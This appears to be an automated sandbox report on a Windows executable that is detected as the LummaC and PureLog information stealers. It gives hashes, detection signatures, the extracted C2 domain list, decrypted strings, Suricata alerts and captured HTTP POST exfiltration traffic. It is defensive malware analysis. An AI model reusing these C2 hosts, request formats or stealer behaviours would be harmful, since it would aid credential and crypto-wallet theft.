Edit tour

Windows Analysis Report
mWAik6b.exe

Overview

General Information

Sample name:	mWAik6b.exe
Analysis ID:	1590828
MD5:	16a53e18ca53fe602974f0a4b7ffbf3c
SHA1:	8c4b935040158b1ba65a599413b14e8d9e3b975e
SHA256:	bb3b567a9f65a64f444738b2c73e8698db247a6b78aa0d1c6ae6cd05bdcc31a9
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

mWAik6b.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\mWAik6b.exe" MD5: 16A53E18CA53FE602974F0A4B7FFBF3C)

mWAik6b.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\mWAik6b.exe" MD5: 16A53E18CA53FE602974F0A4B7FFBF3C)

mWAik6b.exe (PID: 940 cmdline: "C:\Users\user\Desktop\mWAik6b.exe" MD5: 16A53E18CA53FE602974F0A4B7FFBF3C)

WerFault.exe (PID: 344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["pain-temper.bond", "crookedfoshe.bond", "strivehelpeu.bond", "immolatechallen.bond", "stripedre-lot.bond", "jarry-fixxer.bond", "growthselec.bond", "cultureddirtys.click", "jarry-deatile.bond"], "Build id": "LPnhqo--zdqcssmdpvku"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mWAik6b.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.mWAik6b.exe.30000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.mWAik6b.exe.34a9550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.mWAik6b.exe.34a9550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:15:10.078904+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	172.67.150.129	443	TCP
2025-01-14T16:15:11.108776+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	172.67.150.129	443	TCP
2025-01-14T16:15:12.429285+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	172.67.150.129	443	TCP
2025-01-14T16:15:13.839625+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	172.67.150.129	443	TCP
2025-01-14T16:15:15.246349+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	172.67.150.129	443	TCP
2025-01-14T16:15:16.391120+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	172.67.150.129	443	TCP
2025-01-14T16:15:20.742313+0100	2028371	3	Unknown Traffic	192.168.2.5	49719	172.67.150.129	443	TCP
2025-01-14T16:15:29.547266+0100	2028371	3	Unknown Traffic	192.168.2.5	49760	172.67.150.129	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:15:10.627860+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	172.67.150.129	443	TCP
2025-01-14T16:15:11.585608+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	172.67.150.129	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:15:10.627860+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49705	172.67.150.129	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:15:11.585608+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49706	172.67.150.129	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T16:15:19.932487+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49716	172.67.150.129	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cultureddirtys.click/C	Avira URL Cloud: Label: malware
Source: https://cultureddirtys.click/w	Avira URL Cloud: Label: malware
Source: https://cultureddirtys.click/api	Avira URL Cloud: Label: malware
Source: https://cultureddirtys.click:443/apindows	Avira URL Cloud: Label: malware
Source: cultureddirtys.click	Avira URL Cloud: Label: malware
Source: https://cultureddirtys.click/	Avira URL Cloud: Label: malware
Source: https://cultureddirtys.click:443/apiles	Avira URL Cloud: Label: malware
Source: https://cultureddirtys.click/apiC	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.mWAik6b.exe.34a9550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["pain-temper.bond", "crookedfoshe.bond", "strivehelpeu.bond", "immolatechallen.bond", "stripedre-lot.bond", "jarry-fixxer.bond", "growthselec.bond", "cultureddirtys.click", "jarry-deatile.bond"], "Build id": "LPnhqo--zdqcssmdpvku"}

Multi AV Scanner detection for submitted file

Source: mWAik6b.exe	Virustotal: Detection: 29%			Perma Link
Source: mWAik6b.exe	ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for sample

Source: mWAik6b.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-fixxer.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pain-temper.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-deatile.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: growthselec.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stripedre-lot.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immolatechallen.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crookedfoshe.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: strivehelpeu.bond
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cultureddirtys.click
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: LPnhqo--zdqcssmdpvku

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 2_2_0041734A CryptUnprotectData,

2_2_0041734A

Source: mWAik6b.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49719 version: TLS 1.2

Source: mWAik6b.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: Manjohn.pdb source: mWAik6b.exe, WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb$h source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.pdb0= source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER4E41.tmp.dmp.6.dr

Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov eax, ebx	2_2_00424050
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+02h]	2_2_00427A00
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_0040D22E
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-77h]	2_2_0042EAD2
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0042E2AC
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	2_2_0041734A
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov edx, ecx	2_2_00409B10
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00441BA0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh	2_2_0043A490
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+358FBB0Ch]	2_2_0043A5E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_00440DF0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h	2_2_00440DF0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	2_2_0042A860
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041E800
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov edx, ecx	2_2_0043D800
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h	2_2_004190C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_004190C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ebx, eax	2_2_00405880
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ebp, eax	2_2_00405880
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax-5008EDC1h]	2_2_0042F093
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0042F093
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then push ebx	2_2_0043B0B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp edx, esi	2_2_0043B0B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_0042D150
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-5D5D628Ah]	2_2_0040E158
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov word ptr [esi], cx	2_2_0040E158
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00418927
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov cl, 0Ch	2_2_00418927
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [edx], cl	2_2_0042F9CB
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ecx, eax	2_2_004091E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_0043D990
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp word ptr [edi+esi+02h], 0000h	2_2_004201B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ecx, eax	2_2_004269BC
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then jmp eax	2_2_00424A40
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov eax, esi	2_2_0040AA70
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ecx, edx	2_2_0040AA70
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00427230
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx esi, dl	2_2_0041A280
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edi, byte ptr [esi]	2_2_0041EA90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	2_2_00421290
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	2_2_00440340
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00429374
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00402B30
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_0042AB3B
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov esi, edi	2_2_0042AB3B
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_004073F0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_004073F0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-0F4DCB18h]	2_2_0042FB85
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-0F4DCB18h]	2_2_0042FB85
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-0F4DCB18h]	2_2_0042FB85
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then lea ecx, dword ptr [esp+28h]	2_2_004283A6
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ecx, word ptr [esi]	2_2_004403B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then inc edi	2_2_004403B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0042CC70
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then jmp eax	2_2_0042A4C7
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042B4E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0042D4E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0042D4E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then test esi, esi	2_2_0043B4A0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then inc edi	2_2_004404B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [edi+ecx-4ECF344Eh]	2_2_0041655E
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov ecx, eax	2_2_0041B560
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041B560
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax-5008EDC1h]	2_2_0042F578
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0042F578
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00429DCC
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00437DF0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then lea ecx, dword ptr [esp+28h]	2_2_00427D90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0000008Eh]	2_2_00427D90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0000008Eh]	2_2_00427D90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_00415599
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax]	2_2_00415599
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then inc edi	2_2_004405A0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov edx, dword ptr [esi+000000D8h]	2_2_00417DAA
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov word ptr [esi], cx	2_2_00426E50
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov dword ptr [esp], 535251F4h	2_2_00419E70
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then inc edi	2_2_00440630
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then inc edi	2_2_004406D0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C18AD805h	2_2_0040D6DE
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0042DE89
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov edx, eax	2_2_00427EAD
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov edi, dword ptr [esp+10h]	2_2_0043FEB1
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_0042AF5C
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_00408F70
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then jmp eax	2_2_004247C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then mov esi, ecx	2_2_004217C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then lea ecx, dword ptr [esp+28h]	2_2_00427F95
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0000008Eh]	2_2_00427F95
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-42457FE7h]	2_2_0040C7B6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49716 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.150.129:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: pain-temper.bond
Source: Malware configuration extractor	URLs: crookedfoshe.bond
Source: Malware configuration extractor	URLs: strivehelpeu.bond
Source: Malware configuration extractor	URLs: immolatechallen.bond
Source: Malware configuration extractor	URLs: stripedre-lot.bond
Source: Malware configuration extractor	URLs: jarry-fixxer.bond
Source: Malware configuration extractor	URLs: growthselec.bond
Source: Malware configuration extractor	URLs: cultureddirtys.click
Source: Malware configuration extractor	URLs: jarry-deatile.bond

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49760 -> 172.67.150.129:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.150.129:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cultureddirtys.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cultureddirtys.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YM6I1A3CSQRETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: cultureddirtys.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GBQG17QEBFSFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: cultureddirtys.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LIGXB76K4YWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20532Host: cultureddirtys.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PVRY6W5H1M5QJ1ASYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1404Host: cultureddirtys.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O7RCR1HE9Y0FPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572527Host: cultureddirtys.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cultureddirtys.click

Source: unknown

